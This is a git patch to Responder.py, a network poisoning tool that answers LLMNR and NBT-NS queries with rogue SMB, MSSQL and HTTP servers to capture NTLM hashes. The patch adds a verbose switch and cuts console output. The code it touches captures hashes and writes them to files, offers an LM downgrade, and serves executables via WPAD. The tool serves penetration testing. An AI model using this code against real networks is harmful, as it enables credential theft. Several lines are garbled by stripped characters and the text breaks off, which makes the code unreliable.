From 46b98a616d540ae618198784d0775e687371858e Mon Sep 17 00:00:00 2001 From: lgandx Date: Wed, 18 Dec 2013 10:51:15 -0500 Subject: [PATCH] added: Command switch -v for verbose mode. Responder is now less verbose. --- Responder.py | 156 ++++++++++++++++++++++++++------------------------- 1 file changed, 80 insertions(+), 76 deletions(-) diff --git a/Responder.py b/Responder.py index 2dff36c..715f2a0 100644 --- a/Responder.py +++ b/Responder.py @@ -40,6 +40,8 @@ parser.add_option('-w','--wpad', action="store", dest="WPAD_On_Off", help = "Set parser.add_option('--lm',action="store", help="Set this to Off if you want to force LM hashing downgrade for Windows XP/2003 and earlier. Default value is Off", metavar="Off",dest="LM_On_Off", choices=['On','ON','Off','OFF'], default="Off") +parser.add_option('-v',action="store_true", help="More verbose",dest="Verbose") + options, args = parser.parse_args() if options.OURIP is None: @@ -75,6 +77,7 @@ Wredirect = options.Wredirect.upper() Basic = options.Basic.upper() Finger_On_Off = options.Finger.upper() INTERFACE = options.INTERFACE +Verbose = options.Verbose if INTERFACE != "Not set": BIND_TO_Interface = INTERFACE @@ -125,19 +128,35 @@ def WriteData(outfile,data, user): with open(outfile,"r") as filestr: if re.search(user.encode('hex'), filestr.read().encode('hex')): filestr.close() - return None + return False + if re.search("\$", user): + filestr.close() + return False else: with open(outfile,"a") as outf2: outf2.write(data) outf2.write("\n") outf2.close() +def PrintData(outfile,user): + if Verbose == True: + return True + if os.path.isfile(outfile) == True: + with open(outfile,"r") as filestr: + if re.search(user, filestr.read()): + filestr.close() + return False + else: + return True + else: + return True + # Break out challenge for the hexidecimally challenged. Also, avoid 2 different challenges by accident. Challenge = "" for i in range(0,len(NumChal),2): Challenge += NumChal[i:i+2].decode("hex") -Show_Help("[+]NBT-NS & LLMNR responder started\n[+]Loading Responder.conf File..\nGlobal Parameters set:\nResponder is bound to this interface:%s\nChallenge set is: %s\nWPAD Proxy Server is:%s\nWPAD script loaded:%s\nHTTP Server is:%s\nHTTPS Server is:%s\nSMB Server is:%s\nSMB LM support is set to:%s\nSQL Server is:%s\nFTP Server is:%s\nDNS Server is:%s\nLDAP Server is:%s\nFingerPrint Module is:%s\nServing Executable via HTTP&WPAD is:%s\nAlways Serving a Specific File via HTTP&WPAD is:%s\n\n"%(BIND_TO_Interface, NumChal,WPAD_On_Off,WPAD_Script,On_Off,SSL_On_Off,SMB_On_Off,LM_On_Off,SQL_On_Off,FTP_On_Off,DNS_On_Off,LDAP_On_Off,Finger_On_Off,Exe_On_Off,Exec_Mode_On_Off)) +Show_Help("[+]NBT-NS & LLMNR responder started\n[+]Loading Responder.conf File..\nGlobal Parameters set:\nResponder is bound to this interface:%s\nChallenge set is:%s\nWPAD Proxy Server is:%s\nWPAD script loaded:%s\nHTTP Server is:%s\nHTTPS Server is:%s\nSMB Server is:%s\nSMB LM support is set to:%s\nSQL Server is:%s\nFTP Server is:%s\nDNS Server is:%s\nLDAP Server is:%s\nFingerPrint Module is:%s\nServing Executable via HTTP&WPAD is:%s\nAlways Serving a Specific File via HTTP&WPAD is:%s\n\n"%(BIND_TO_Interface, NumChal,WPAD_On_Off,WPAD_Script,On_Off,SSL_On_Off,SMB_On_Off,LM_On_Off,SQL_On_Off,FTP_On_Off,DNS_On_Off,LDAP_On_Off,Finger_On_Off,Exe_On_Off,Exec_Mode_On_Off)) #Simple NBNS Services. W_REDIRECT = "\x41\x41\x00" @@ -366,7 +385,6 @@ def ParseShare(data): a = re.search('(\\x5c\\x00\\x5c.*.\\x00\\x00\\x00)', packet) if a: quote = "Share requested: "+a.group(0) - print quote.replace('\x00','') logging.warning(quote.replace('\x00','')) #Parse SMB NTLMSSP v1/v2 @@ -390,37 +408,35 @@ def ParseSMBHash(data,client): NthashOffset = struct.unpack(' 60: - print "[+]SMB-NTLMv2 hash captured from : ",client outfile = "SMB-NTLMv2-Client-"+client+".txt" NtHash = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper() DomainLen = struct.unpack(' 25: Hash = data[65+LMhashLen:65+LMhashLen+NthashLen] logging.warning('[+]SMB-NTLMv2 hash captured from :%s'%(client)) - print "[+]SMB-NTLMv2 hash captured from :",client outfile = "SMB-NTLMv2-Client-"+client+".txt" pack = tuple(data[89+NthashLen:].split('\x00\x00\x00'))[:2] var = [e.replace('\x00','') for e in data[89+NthashLen:Bcc+60].split('\x00\x00\x00')[:2]] Username, Domain = tuple(var) Writehash = Username+"::"+Domain+":"+NumChal+":"+Hash.encode('hex')[:32].upper()+":"+Hash.encode('hex')[32:].upper() - WriteData(outfile,Writehash, Username+"::"+Domain) - print "[+]SMB-NTLMv2 complete hash is :",Writehash + if PrintData(outfile,Username+"::"+Domain): + print "[+]SMB-NTLMv2 hash captured from :",client + print "[+]SMB-NTLMv2 complete hash is :",Writehash + ParseShare(data) + WriteData(outfile,Writehash, Username+"::"+Domain) logging.warning('[+]SMB-NTLMv2 complete hash is :%s'%(Writehash)) - print "Username : ",Username - logging.warning('[+]SMB-NTLMv2 Username:%s'%(Username)) - print "Domain (if joined, if not then computer name) : ",Domain - logging.warning('[+]SMB-NTLMv2 Domain (if joined, if not then computer name) :%s'%(Domain)) if NthashLen == 24: - print "[+]SMB-NTLMv1 hash captured from : ",client logging.warning('[+]SMB-NTLMv1 hash captured from :%s'%(client)) outfile = "SMB-NTLMv1-Client-"+client+".txt" pack = tuple(data[89+NthashLen:].split('\x00\x00\x00'))[:2] var = [e.replace('\x00','') for e in data[89+NthashLen:Bcc+60].split('\x00\x00\x00')[:2]] Username, Domain = tuple(var) writehash = Username+"::"+Domain+":"+data[65:65+LMhashLen].encode('hex').upper()+":"+data[65+LMhashLen:65+LMhashLen+NthashLen].encode('hex').upper()+":"+NumChal - WriteData(outfile,writehash, Username+"::"+Domain) - print "[+]SMB complete hash is :", writehash + if PrintData(outfile,Username+"::"+Domain): + print "[+]SMB-NTLMv1 hash captured from : ",client + print "[+]SMB complete hash is :", writehash + ParseShare(data) + WriteData(outfile,writehash, Username+"::"+Domain) logging.warning('[+]SMB-NTLMv1 complete hash is :%s'%(writehash)) - print "Username : ",Username logging.warning('[+]SMB-NTLMv1 Username:%s'%(Username)) - print "Domain (if joined, if not then computer name) : ",Domain logging.warning('[+]SMB-NTLMv1 Domain (if joined, if not then computer name) :%s'%(Domain)) - packet = data[:] - a = re.search('(\\x5c\\x00\\x5c.*.\\x00\\x00\\x00)', packet) - if a: - quote = "Share requested: "+a.group(0) - print quote.replace('\x00','') - logging.warning(quote.replace('\x00','')) except Exception: raise @@ -522,8 +530,8 @@ class SMB1(BaseRequestHandler): data = self.request.recv(4096) if data[8:10] == "\x73\x00": if Is_Anonymous(data): - head = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(data),tid="\x00\x00",uid=uidcalc(data),mid=midcalc(data)) - final = SMBSessEmpty()###should always send errorcode="\x72\x00\x00\xc0" account disabled for anonymous logins. + head = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(data),tid="\x00\x00",uid=uidcalc(data),mid=midcalc(data))###should always send errorcode="\x72\x00\x00\xc0" account disabled for anonymous logins. + final = SMBSessEmpty() packet1 = str(head)+str(final) buffer1 = longueur(packet1)+packet1 self.request.send(buffer1) @@ -636,44 +644,42 @@ def ParseSQLHash(data,client): LMHash = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper() NthashLen = struct.unpack(' 60: - print "[+]MSSQL NTLMv2 Hash captured from :",client - logging.warning('[+]MsSQL NTLMv2 hash captured from :%s'%(client)) DomainLen = struct.unpack(' 24: - print "[+]HTTP NTLMv2 hash captured from :",client - logging.warning('[+]HTTP NTLMv2 hash captured from :%s'%(client)) NthashLen = 64 DomainLen = struct.unpack('